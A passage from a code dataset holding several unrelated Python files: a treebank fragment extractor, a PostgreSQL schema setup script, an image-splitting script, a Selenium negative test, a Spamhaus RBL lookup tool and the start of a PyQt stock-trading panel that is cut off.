_fragments.exactcounts(bitsets, trees1, PARAMS['trees2'],\n\t\t\t\tindices=PARAMS['indices'])\n\t\tlogging.debug('complete matches chunk %d of %d', n + 1, m)\n\t\treturn results\n\tresults = _fragments.exactcounts(\n\t\t\tbitsets, trees1, trees1, indices=PARAMS['indices'])\n\tif PARAMS['indices']:\n\t\tlogging.debug('exact indices chunk %d of %d', n + 1, m)\n\telse:\n\t\tlogging.debug('exact counts chunk %d of %d', n + 1, m)\n\treturn results\n\n\ndef workload(numtrees, mult, numproc):\n\t\"\"\"Calculate an even workload.\n\n\tWhen *n* trees are compared against themselves, ``n * (n - 1)`` total\n\tcomparisons are made. Each tree ``m`` has to be compared to all trees ``x``\n\tsuch that ``m < x <= n``\n\t(meaning there are more comparisons for lower *n*).\n\n\t:returns: a sequence of ``(start, end)`` intervals such that\n\t\tthe number of comparisons is approximately balanced.\"\"\"\n\t# could base on number of nodes as well.\n\tif numproc == 1:\n\t\treturn [(0, numtrees)]\n\t# here chunk is the number of tree pairs that will be compared\n\tgoal = togo = total = 0.5 * numtrees * (numtrees - 1)\n\tchunk = total // (mult * numproc) + 1\n\tgoal -= chunk\n\tresult = []\n\tlast = 0\n\tfor n in range(1, numtrees):\n\t\ttogo -= numtrees - n\n\t\tif togo <= goal:\n\t\t\tgoal -= chunk\n\t\t\tresult.append((last, n))\n\t\t\tlast = n\n\tif last < numtrees:\n\t\tresult.append((last, numtrees))\n\treturn result\n\n\ndef recurringfragments(trees, sents, numproc=1, disc=True,\n\t\tindices=True, maxdepth=1,\n\t\tmaxfrontier=999):\n\t\"\"\"Get recurring fragments with exact counts in a single treebank.\n\n\t:returns: a dictionary whose keys are fragments as strings, and\n\t\tindices as values. When ``disc`` is ``True``, keys are of the form\n\t\t``(frag, sent)`` where ``frag`` is a unicode string, and ``sent``\n\t\tis a list of words as unicode strings; when ``disc`` is ``False``, keys\n\t\tare of the form ``frag`` where ``frag`` is a unicode string.\n\t:param trees: a sequence of binarized Tree objects, with indices as leaves.\n\t:param sents: the corresponding sentences (lists of strings).\n\t:param numproc: number of processes to use; pass 0 to use detected # CPUs.\n\t:param disc: when disc=True, assume trees with discontinuous constituents;\n\t\tresulting fragments will be of the form (frag, sent);\n\t\totherwise fragments will be strings with words as leaves.\n\t:param indices: when False, return integer counts instead of indices.\n\t:param maxdepth: when > 0, add 'cover' fragments to result, corresponding\n\t\tto all fragments up to given depth; pass 0 to disable.\n\t:param maxfrontier: maximum number of frontier non-terminals (substitution\n\t\tsites) in cover fragments; a limit of 0 only gives fragments that\n\t\tbottom out in terminals; the default 999 is unlimited for practical\n\t\tpurposes.\"\"\"\n\tif numproc == 0:\n\t\tnumproc = cpu_count()\n\tnumtrees = len(trees)\n\tif not numtrees:\n\t\traise ValueError('no trees.')\n\tmult = 1 # 3 if numproc > 1 else 1\n\tfragments = {}\n\ttrees = trees[:]\n\twork = workload(numtrees, mult, numproc)\n\tPARAMS.update(disc=disc, indices=indices, approx=False, complete=False,\n\t\t\tdebug=False, adjacent=False, twoterms=None)\n\tinitworkersimple(trees, list(sents))\n\tif numproc == 1:\n\t\tmymap, myworker = map, worker\n\telse:\n\t\tlogging.info('work division:\\n%s', '\\n'.join(' %s: %r' % kv\n\t\t\t\tfor kv in sorted(dict(numchunks=len(work),\n\t\t\t\t\tnumproc=numproc).items())))\n\t\t# start worker processes\n\t\tpool = multiprocessing.Pool(\n\t\t\t\tprocesses=numproc, initializer=initworkersimple,\n\t\t\t\tinitargs=(trees, list(sents)))\n\t\tmymap, myworker = pool.map, mpworker\n\t# collect recurring fragments\n\tlogging.info('extracting recurring fragments')\n\tfor a in mymap(myworker, work):\n\t\tfragments.update(a)\n\tfragmentkeys = list(fragments)\n\tbitsets = [fragments[a] for a in fragmentkeys]\n\tcountchunk = len(bitsets) // numproc + 1\n\twork = list(range(0, len(bitsets), countchunk))\n\twork = [(n, len(work), bitsets[a:a + countchunk])\n\t\t\tfor n, a in enumerate(work)]\n\tlogging.info('getting exact counts for %d fragments', len(bitsets))\n\tcounts = []\n\tfor a in mymap(\n\t\t\texactcountworker if numproc == 1 else mpexactcountworker, work):\n\t\tcounts.extend(a)\n\t# add all fragments up to a given depth\n\tif maxdepth:\n\t\tcover = _fragments.allfragments(PARAMS['trees1'], PARAMS['vocab'],\n\t\t\t\tmaxdepth, maxfrontier, disc, indices)\n\t\tbefore = len(fragmentkeys)\n\t\tfor a in cover:\n\t\t\tif a not in fragments:\n\t\t\t\tfragmentkeys.append(a)\n\t\t\t\tcounts.append(cover[a])\n\t\tlogging.info('merged %d cover fragments '\n\t\t\t\t'up to depth %d with max %d frontier non-terminals.',\n\t\t\t\tlen(fragmentkeys) - before, maxdepth, maxfrontier)\n\tif numproc != 1:\n\t\tpool.close()\n\t\tpool.join()\n\t\tdel pool\n\tlogging.info('found %d fragments', len(fragmentkeys))\n\treturn dict(zip(fragmentkeys, counts))\n\n\ndef allfragments(trees, sents, maxdepth, maxfrontier=999):\n\t\"\"\"Return all fragments up to a certain depth, # frontiers.\"\"\"\n\tPARAMS.update(disc=True, indices=True, approx=False, complete=False,\n\t\t\tdebug=False, adjacent=False, twoterms=None)\n\tinitworkersimple(trees, list(sents))\n\treturn _fragments.allfragments(PARAMS['trees1'],\n\t\t\tPARAMS['vocab'], maxdepth, maxfrontier,\n\t\t\tdisc=PARAMS['disc'], indices=PARAMS['indices'])\n\n\ndef altrepr(a):\n\t\"\"\"Rewrite bracketed tree to alternative format.\n\n\tReplace double quotes with double single quotes: \" -> ''\n\tQuote terminals with double quotes terminal: -> \"terminal\"\n\tRemove parentheses around frontier nodes: (NN ) -> NN\n\n\t>>> print(altrepr('(NP (DT a) (NN ))'))\n\t(NP (DT \"a\") NN)\n\t\"\"\"\n\treturn FRONTIERRE.sub(r'\\1', TERMRE.sub(r'(\\1 \"\\2\")', a.replace('\"', \"''\")))\n\n\ndef debinarize(fragments):\n\t\"\"\"Debinarize fragments; fragments that fail to debinarize left as-is.\"\"\"\n\tresult = []\n\tfor origfrag in fragments:\n\t\tfrag, sent = (discbrackettree(origfrag) if PARAMS['disc']\n\t\t\t\telse brackettree(origfrag, detectdisc=False))\n\t\ttry:\n\t\t\tfrag = writetree(unbinarize(frag), sent, 0,\n\t\t\t\t\t'discbracket' if PARAMS['disc'] else 'bracket').strip()\n\t\texcept Exception: # pylint: disable=broad-except\n\t\t\tresult.append(origfrag)\n\t\telse:\n\t\t\tresult.append(frag)\n\treturn result\n\n\ndef printfragments(fragments, counts, out=None):\n\t\"\"\"Dump fragments to standard output or some other file object.\"\"\"\n\tif out is None:\n\t\tout = sys.stdout\n\t\tif sys.stdout.encoding is None:\n\t\t\tout = codecs.getwriter('utf8')(out)\n\tif PARAMS['alt']:\n\t\tfor n, a in enumerate(fragments):\n\t\t\tfragments[n] = altrepr(a)\n\tif PARAMS['complete']:\n\t\tlogging.info('total number of matches: %d',\n\t\t\t\tsum(sum(a) for a in counts)\n\t\t\t\tif PARAMS['indices'] else sum(counts))\n\telse:\n\t\tlogging.info('number of fragments: %d', len(fragments))\n\tif PARAMS['nofreq']:\n\t\tfor a in fragments:\n\t\t\tout.write(a + '\\n')\n\t\treturn\n\t# a frequency of 0 is normal when counting occurrences of given fragments\n\t# in a second treebank\n\tif PARAMS['complete']:\n\t\tthreshold = 0\n\t\tzeroinvalid = False\n\t# a frequency of 1 is normal when comparing two treebanks\n\t# or when non-recurring fragments are added\n\telif PARAMS.get('trees2') or PARAMS['cover'] or PARAMS['approx']:\n\t\tthreshold = 0\n\t\tzeroinvalid = True\n\telse: # otherwise, raise alarm.\n\t\tthreshold = 1\n\t\tzeroinvalid = True\n\tif PARAMS['indices']:\n\t\tfor a, theindices in zip(fragments, counts):\n\t\t\tif len(theindices) > threshold:\n\t\t\t\tout.write('%s\\t%s\\n' % (a,\n\t\t\t\t\t[n for n in theindices\n\t\t\t\t\t\tif n - 1 in theindices or n + 1 in theindices]\n\t\t\t\t\tif PARAMS['adjacent'] else\n\t\t\t\t\tstr(theindices)[len(\"array('I', \"):-len(')')]))\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=1: %r' % a)\n\telif PARAMS['relfreq']:\n\t\tsums = defaultdict(int)\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tif freq > threshold:\n\t\t\t\tsums[a[1:a.index(' ')]] += freq\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=%d: %r' % (\n\t\t\t\t\tfreq, a))\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tout.write('%s\\t%d/%d\\n' % (\n\t\t\t\ta, freq, sums[a[1:a.index(' ')]]))\n\telse:\n\t\tfor a, freq in zip(fragments, counts):\n\t\t\tif freq > threshold:\n\t\t\t\tout.write('%s\\t%d\\n' % (a, freq))\n\t\t\telif zeroinvalid:\n\t\t\t\traise ValueError('invalid fragment--frequency=1: %r' % a)\n\n\ndef cpu_count():\n\t\"\"\"Return number of CPUs or 1.\"\"\"\n\ttry:\n\t\treturn multiprocessing.cpu_count()\n\texcept NotImplementedError:\n\t\treturn 1\n\n\ndef test():\n\t\"\"\"Demonstration of fragment extractor.\"\"\"\n\tmain('--fmt=export alpinosample.export'.split())\n\n\n__all__ = ['main', 'regular', 'batch', 'readtreebanks', 'read2ndtreebank',\n\t\t'initworker', 'initworkersimple', 'worker', 'exactcountworker',\n\t\t'workload', 'recurringfragments', 'allfragments', 'debinarize',\n\t\t'printfragments', 'altrepr', 'cpu_count']\n","repo_name":"andreasvc/disco-dop","sub_path":"discodop/fragments.py","file_name":"fragments.py","file_ext":"py","file_size_in_byte":21251,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"72"} +{"seq_id":"7283058636","text":"import argparse\nimport configparser\nimport os\nfrom typing import Any, Optional, Sequence, Tuple\n\nimport psycopg2\nfrom psycopg2.extras import execute_values\n\nCOMMANDS = [\"init\", \"reset\", \"destroy\"]\n\n\ndef get_db(\n conf: configparser.ConfigParser, superuser: Optional[bool] = False\n) -> psycopg2.extensions.connection:\n cfg_section = \"ingest\" if superuser else \"postgresql\"\n dbname = conf[cfg_section][\"database\"]\n user = conf[cfg_section][\"user\"]\n password = conf[cfg_section].get(\"password\", None)\n host = conf[cfg_section][\"host\"]\n port = conf[cfg_section][\"port\"]\n conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host, port=port)\n return conn\n\n\ndef clear_db(conf: configparser.ConfigParser) -> None:\n sql = \"\"\"\n DROP SCHEMA IF EXISTS mars CASCADE;\n DROP USER IF EXISTS mars_user;\n \"\"\"\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n cur.execute(sql)\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error:\", error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef init_db(conf: configparser.ConfigParser, schema_path: str) -> None:\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n\n with open(schema_path, \"r\") as sql:\n cur.execute(sql.read(), (conf[\"postgresql\"][\"password\"],))\n\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error:\", error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef insert_many(\n conf: configparser.ConfigParser, insert_sql: str, data: Sequence[Tuple[Any, ...]]\n) -> None:\n conn = None\n try:\n conn = get_db(conf, superuser=True)\n cur = conn.cursor()\n execute_values(cur, insert_sql, data, page_size=1000)\n cur.close()\n conn.commit()\n except psycopg2.DatabaseError as error:\n print(\"error: \", error)\n finally:\n if conn is not None:\n conn.close()\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"command\", choices=COMMANDS)\n parser.add_argument(\"--config\", help=\"Path to config file.\", default=\"config.ini\", type=str)\n args = parser.parse_args()\n\n config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())\n config.read(args.config)\n\n this_file_path = os.path.dirname(os.path.realpath(__file__))\n schema_file = \"schema.sql\"\n schema_full_path = os.path.join(this_file_path, schema_file)\n\n if args.command == \"init\":\n init_db(config, schema_full_path)\n elif args.command == \"reset\":\n clear_db(config)\n init_db(config, schema_full_path)\n elif args.command == \"destroy\":\n clear_db(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"appaccess/LAMA-CHI2022","sub_path":"mars/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2898,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23648246514","text":"import cv2\n\ngridWidth = 3\ngridHeight = 3\n\nimg = cv2.imread(\"../Resources/cat.jpg\")\nheight, width = img.shape[:2]\n\nframeWidth = width / gridWidth\nframeHeight = height / gridHeight\n\ncv2.imshow(\"Image\", img)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\nfor x in range(0, gridWidth):\n for y in range(0, gridHeight):\n frame = img[int(frameHeight * y) : int(frameHeight * (y + 1)), int(frameWidth * x) : int(frameWidth * (x + 1))]\n cv2.imshow(f\"{x}, {y}\", frame)\n cv2.imwrite(f\"Results/{y} {x}.jpg\", frame)\n\ncv2.waitKey()","repo_name":"AmXLoVE/robototehnika","sub_path":"Homework1/OpencvTest/Task 1/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28991737836","text":"import time\nimport unittest\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nfrom selenium_config import get_path\n\n\nclass NegativeTest(unittest.TestCase):\n address_good_KC = ['1724 Beacon Way SE Renton, WA 98058', '1925 N 170th St Shoreline, WA 98133']\n address_bad = ['fjweogrgjrgl;jjegjegjgjlgjjgl;jgljgslj', '3000 Royal Hills Dr SE Renton, WA 98058, apt 1d, apt 1d', \\\n '3000 Royal Hills Dr SE Renton WA 98058 apt 1d', \\\n '904 Hiawatha Pl S, Seattle, apt 1C, apt 1C, WA 98144', '', \\\n 'iosfi iosejfdujfi esofjedsj eofe 9898908 kiefkljkj 9898', \\\n '($(*$(#$*#*%(#@*@*!($(*%$*%(*$*$(**!@(*$@(!*$(*(*($*@$*!(@*$', \\\n '()*(* )(_* )* )_()()( )(((( ', \\\n '3000 Royal Hills Dr SE Renton WA 98058 apt 1d apt 1d'\n ]\n address_good = ['8105 SE Henderson St Portland, OR 97206']\n zip_good = ['98058', '98053']\n\n @classmethod\n def setUp(inst):\n options = Options() # set custom paths\n options.binary_location = get_path().crome_path # set custom paths\n inst.driver = webdriver.Chrome(chrome_options=options,\n executable_path=get_path().webdriver_path, ) # set custom paths\n inst.driver.implicitly_wait(30)\n inst.driver.maximize_window()\n # navigate to the application home page\n inst.driver.get(get_path().app_path) # get the homepage\n\n def test_search_by_address_negative(self):\n # self.driver.execute_script(\"alert('This is an alert');\")\n res = True\n for el in self.address_bad:\n self.search_field = self.driver.find_element_by_name('address') # find_element_by_name\n self.search_field.send_keys(el) # input address\n self.search_field.submit() # press search\n if not self.is_element_present(By.CLASS_NAME, \"price\"):\n res = False\n print(\"address=\", el)\n break\n else:\n time.sleep(1)\n self.driver.implicitly_wait(5)\n self.driver.get(get_path().app_path)\n self.assertTrue(res)\n\n @classmethod\n def tearDown(inst):\n # close the browser window\n inst.driver.quit()\n\n def is_element_present(self, how, what):\n \"\"\"\n Helper method to confirm the presence of an element on page\n :params how: By locator type\n :params what: locator value\n \"\"\"\n try:\n self.driver.find_element(by=how, value=what)\n except NoSuchElementException:\n return False\n return True\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"huiyuandiknow/Home_Data_App","sub_path":"tests/test_negative.py","file_name":"test_negative.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"37787663928","text":"import argparse\nimport dataclasses\nimport json\nimport sys\n\nfrom typing import Any, Callable, Dict, List, Tuple, Union # noqa: H301\n\nfrom spahau import defs\nfrom spahau import query\nfrom spahau import response\n\n\nResult = Union[str, response.Response, List[response.Response]]\n\nConfigHandler = Callable[[defs.Config, defs.IPAddress], Result]\n\n\nSELFTEST_DATA_DEFS: Dict[str, List[str]] = {\n \"127.0.0.1\": [],\n \"127.0.0.2\": [\"127.0.0.2\", \"127.0.0.4\", \"127.0.0.10\"],\n}\n\nSELFTEST_DATA = {\n defs.IPAddress.parse(name): [\n response.response_desc(defs.IPAddress.parse(item)) for item in value\n ]\n for name, value in SELFTEST_DATA_DEFS.items()\n}\n\n\ndef cmd_describe(_cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Describe the specified RBL return codes.\"\"\"\n return response.response_desc(address)\n\n\ndef cmd_show_hostname(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Build and display the hostname for the query.\"\"\"\n return query.get_hostname(cfg, address)\n\n\ndef cmd_selftest(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Run a self-test.\"\"\"\n expected = SELFTEST_DATA.get(address)\n if expected is None:\n sys.exit(f\"Unknown selftest address '{address}'\")\n\n if not cfg.json:\n print(\n f\"Querying '{address}', expecting {len(expected)} responses: \"\n + \" \".join(f\"'{resp}'\" for resp in expected)\n )\n\n responses = query.query(cfg, address)\n if not cfg.json:\n print(\n f\"...got {len(responses)} responses: \"\n + \" \".join(f\"'{resp}'\" for resp in responses)\n )\n\n if responses != expected:\n sys.exit(f\"Mismatch for '{address}'\")\n\n return responses\n\n\ndef cmd_test(cfg: defs.Config, address: defs.IPAddress) -> Result:\n \"\"\"Describe the specified RBL return codes.\"\"\"\n return query.query(cfg, address)\n\n\ndef parse_arguments() -> Tuple[defs.Config, ConfigHandler]:\n \"\"\"Parse the command-line arguments.\"\"\"\n parser = argparse.ArgumentParser(prog=\"spahau\")\n parser.add_argument(\n \"--describe\",\n \"-D\",\n action=\"store_true\",\n help=\"describe the specified RBL return codes/addresses\",\n )\n parser.add_argument(\n \"--domain\",\n \"-d\",\n type=str,\n default=defs.RBL_DOMAIN,\n help=\"specify the RBL domain to test against\",\n )\n parser.add_argument(\n \"--hostname\",\n \"-H\",\n action=\"store_true\",\n help=\"only output the RBL hostnames, do not send queries\",\n )\n parser.add_argument(\n \"--json\", \"-j\", action=\"store_true\", help=\"display JSON output\"\n )\n parser.add_argument(\n \"--selftest\",\n \"-T\",\n action=\"store_true\",\n help=\"run a self test: try to obtain some expected responses\",\n )\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"verbose operation; display diagnostic output\",\n )\n parser.add_argument(\n \"addresses\",\n type=str,\n nargs=\"+\",\n help=\"the addresses to query or describe\",\n )\n\n args = parser.parse_args()\n\n key = (\n (\"D\" if args.describe else \"\")\n + (\"H\" if args.hostname else \"\")\n + (\"T\" if args.selftest else \"\")\n )\n if len(key) > 1:\n sys.exit(\"At most one of -D, -H, or -T may be specified\")\n handler = {\n \"D\": cmd_describe,\n \"H\": cmd_show_hostname,\n \"T\": cmd_selftest,\n \"\": cmd_test,\n }[key]\n\n return (\n defs.Config(\n addresses=[defs.IPAddress.parse(item) for item in args.addresses],\n domain=str(args.domain),\n json=bool(args.json),\n verbose=bool(args.verbose),\n ),\n handler,\n )\n\n\ndef main() -> None:\n \"\"\"Parse command-line arguments, do cri... err, things.\"\"\"\n cfg, func = parse_arguments()\n\n data: Dict[str, Any] = {}\n for address in cfg.addresses:\n value = func(cfg, address)\n cfg.diag(f\"{address}: got {value}\")\n if cfg.json:\n if not value or isinstance(value, str):\n data[address.text] = value\n elif isinstance(value, response.Response):\n data[address.text] = dataclasses.asdict(value)\n else:\n data[address.text] = [\n dataclasses.asdict(item) for item in value\n ]\n continue\n\n if isinstance(value, (str, response.Response)):\n print(value)\n continue\n\n assert isinstance(value, list)\n if not value:\n print(\n f\"The IP address: {address} is NOT found in \"\n f\"the Spamhaus blacklists.\"\n )\n continue\n\n assert all(isinstance(item, response.Response) for item in value)\n if value and value[0].tag == \"ERROR\":\n print(f\"Could not obtain a response for {address}: {value[0]}\")\n continue\n\n stringified = \" \".join(f\"'{resp}'\" for resp in value)\n print(\n f\"The IP address: {address} is found in the following \"\n f\"Spamhaus public IP zone: {stringified}\"\n )\n\n if cfg.json:\n print(json.dumps(data, indent=2))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ppentchev/python-spahau","sub_path":"python/src/spahau/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":5244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21526673196","text":"\nfrom PyQt5.QtGui import QColor, QFont, QPalette\nfrom PyQt5.QtCore import QEvent, Qt #QString\nfrom PyQt5.QtWidgets import QApplication, QComboBox, QDialog, QDoubleSpinBox, QLabel, QLineEdit, QMessageBox\nfrom PyQt5.QtWidgets import QPushButton, QRadioButton, QSpinBox, QTextEdit, QGridLayout, QHBoxLayout, QVBoxLayout\n\nimport define\nimport logger\nimport center\nimport trader\n\nclass Panel(QDialog):\n def __init__(self, **kwargs):\n super(Panel, self).__init__()\n self.strategy = kwargs.get(\"strategy\", \"\")\n self.version_info = \"V0.1.0-Beta Build 20180422\"\n self.log_text = \"\"\n self.log_cate = \"Panel_Trader_STK_APE\"\n self.logger = logger.Logger()\n \n self.InitUserInterface()\n \n self.symbol = \"\"\n self.exchange = \"\" # SH、SZ 或 SSE、SZE # 目前只订阅个股行情,不考虑沪深个股和指数代码重合问题\n self.trader = None # 策略中赋值\n self.subscribe = False # 行情订阅标志\n self.center = center.Center()\n \n self.quote_data = None\n self.price_round_stock = 2 # 小数位数\n self.price_round_index = 2 # 小数位数\n\n def OnWorking(self): # 供具体策略继承调用,在 运行 前执行一些操作\n if self.subscribe == False:\n self.center.RegQuoteSub(self.strategy, self.OnQuoteStock, \"stock_ltp\") # 目前只订阅个股\n self.subscribe = True\n self.trader = trader.Trader().GetTrader(\"hbzq\")\n if self.trader == None:\n self.logger.SendMessage(\"E\", 4, self.log_cate, \"获取标识为 hbzq 的交易服务失败!\", \"M\")\n\n def OnSuspend(self): # 供具体策略继承调用,在 暂停 前执行一些操作\n pass\n\n def OnContinue(self): # 供具体策略继承调用,在 继续 前执行一些操作\n pass\n\n def OnTerminal(self): # 供具体策略继承调用,在 停止 前执行一些操作\n if self.subscribe == True:\n self.center.DelQuoteSub(self.strategy, \"stock_ltp\")\n self.subscribe = False\n\n def event(self, event):\n if event.type() == define.DEF_EVENT_TRADER_STK_APE_UPDATE_QUOTE:\n if self.quote_data != None:\n self.OnUpdateQuote(self.quote_data, self.price_round_stock)\n return QDialog.event(self, event)\n\n def OnTraderEvent(self, trader, ret_func, task_item): # 交易模块事件通知,供具体策略继承调用\n if ret_func == define.trade_placeorder_s_func:\n self.log_text = \"%s:%s %d:%d\" % (self.strategy, trader, ret_func, task_item.order.order_id)\n self.logger.SendMessage(\"H\", 2, self.log_cate, self.log_text, \"T\")\n\n def OnQuoteStock(self, msg): # 行情触发\n try:\n str_code = msg.data[0].decode()\n if str_code == self.symbol:\n if \"60\" == str_code[0:2] or \"000\" == str_code[0:3] or \"001\" == str_code[0:3] or \"002\" == str_code[0:3] or \"300\" == str_code[0:3]:\n self.quote_data = msg.data\n QApplication.postEvent(self, QEvent(define.DEF_EVENT_TRADER_STK_APE_UPDATE_QUOTE)) # postEvent异步,sendEvent同步\n except Exception as e:\n self.log_text = \"%s:函数 OnQuoteStock 异常!%s\" % (self.strategy, e)\n self.logger.SendMessage(\"E\", 4, self.log_cate, self.log_text, \"M\")\n\n def InitUserInterface(self):\n self.color_red = QPalette()\n self.color_red.setColor(QPalette.WindowText, Qt.red)\n self.color_green = QPalette()\n self.color_green.setColor(QPalette.WindowText, QColor(0, 128, 0))\n self.color_black = QPalette()\n self.color_black.setColor(QPalette.WindowText, Qt.black)\n \n self.list_exchange = [define.DEF_EXCHANGE_STOCK_SH, define.DEF_EXCHANGE_STOCK_SZ]\n self.list_entr_type = [define.DEF_PRICE_TYPE_STOCK_LIMIT, define.DEF_PRICE_TYPE_STOCK_MARKET]\n \n self.setWindowTitle(\"手动交易-股票-APE %s\" % self.version_info)\n self.resize(380, 300)\n self.setFont(QFont(\"SimSun\", 9))\n \n self.label_exchange = QLabel(\"交易市场\")\n self.label_exchange.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_symbol = QLabel(\"证券代码\")\n self.label_symbol.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_name = QLabel(\"证券名称\")\n self.label_name.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_entr_type = QLabel(\"委托方式\")\n self.label_entr_type.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_can_use = QLabel(\"可用金额\")\n self.label_can_use.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_can_sell = QLabel(\"可用数量\")\n self.label_can_sell.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_price = QLabel(\"委托价格\")\n self.label_price.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_volume = QLabel(\"委托数量\")\n self.label_volume.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n \n self.label_can_use_unit = QLabel(\"元\")\n self.label_can_use_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_can_sell_unit = QLabel(\"股\")\n self.label_can_sell_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_price_unit = QLabel(\"元\")\n self.label_price_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.label_volume_unit = QLabel(\"股\")\n self.label_volume_unit.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n \n self.combo_exchange = QComboBox()\n self.combo_exchange.addItems(self.list_exchange)\n self.line_edit_symbol = QLineEdit(\"\")\n self.line_edit_symbol.setStyleSheet(\"color:red\") # 初始红色\n self.line_edit_symbol.setFont(QFont(\"SimSun\", 9))\n self.line_edit_name = QLineEdit(\"\")\n self.line_edit_name.setReadOnly(True)\n self.line_edit_name.setFont(QFont(\"SimSun\", 9))\n self.line_edit_name.setStyleSheet(\"background-color:rgb(240,240,240);color:red\") # 初始红色\n self.line_edit_name.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.combo_entr_type = QComboBox()\n self.combo_entr_type.addItems(self.list_entr_type)\n self.line_edit_can_use = QLineEdit(\"0.00\")\n self.line_edit_can_use.setReadOnly(True)\n self.line_edit_can_use.setStyleSheet(\"background-color:rgb(240,240,240)\")\n self.line_edit_can_use.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.line_edit_can_sell = QLineEdit(\"0\")\n self.line_edit_can_sell.setReadOnly(True)\n self.line_edit_can_sell.setStyleSheet(\"background-color:rgb(240,240,240)\")\n self.line_edit_can_sell.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.spin_price = QDoubleSpinBox()\n self.spin_price.setDecimals(4)\n self.spin_price.setMinimum(0)\n self.spin_price.setMaximum(100000)\n self.spin_price.setStyleSheet(\"color:red\") # 初始红色\n self.spin_price.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.spin_volume = QSpinBox()\n self.spin_volume.setMinimum(0)\n self.spin_volume.setMaximum(1000000)\n self.spin_volume.setSingleStep(100)\n self.spin_volume.setStyleSheet(\"color:red\") # 初始红色\n self.spin_volume.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n \n self.grid_layout_essential = QGridLayout()\n self.grid_layout_essential.setContentsMargins(-1, -1, -1, -1)\n self.grid_layout_essential.addWidget(self.label_exchange, 0, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_symbol, 1, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_name, 2, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_entr_type, 3, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_can_use, 4, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_can_sell, 5, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_price, 6, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.label_volume, 7, 0, 1, 1)\n self.grid_layout_essential.addWidget(self.combo_exchange, 0, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.line_edit_symbol, 1, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.line_edit_name, 2, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.combo_entr_type, 3, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.line_edit_can_use, 4, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.line_edit_can_sell, 5, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.spin_price, 6, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.spin_volume, 7, 1, 1, 1)\n self.grid_layout_essential.addWidget(self.label_can_use_unit, 4, 2, 1, 1)\n self.grid_layout_essential.addWidget(self.label_can_sell_unit, 5, 2, 1, 1)\n self.grid_layout_essential.addWidget(self.label_price_unit, 6, 2, 1, 1)\n self.grid_layout_essential.addWidget(self.label_volume_unit, 7, 2, 1, 1)\n \n self.radio_button_buy = QRadioButton(\"买 入\")\n self.radio_button_buy.setStyleSheet(\"color:red\")\n self.radio_button_buy.setFont(QFont(\"SimSun\", 9))\n self.radio_button_buy.setChecked(True)\n self.radio_button_buy.setFixedWidth(70)\n self.radio_button_sell = QRadioButton(\"卖 出\")\n self.radio_button_sell.setStyleSheet(\"color:green\")\n self.radio_button_sell.setFont(QFont(\"SimSun\", 9))\n 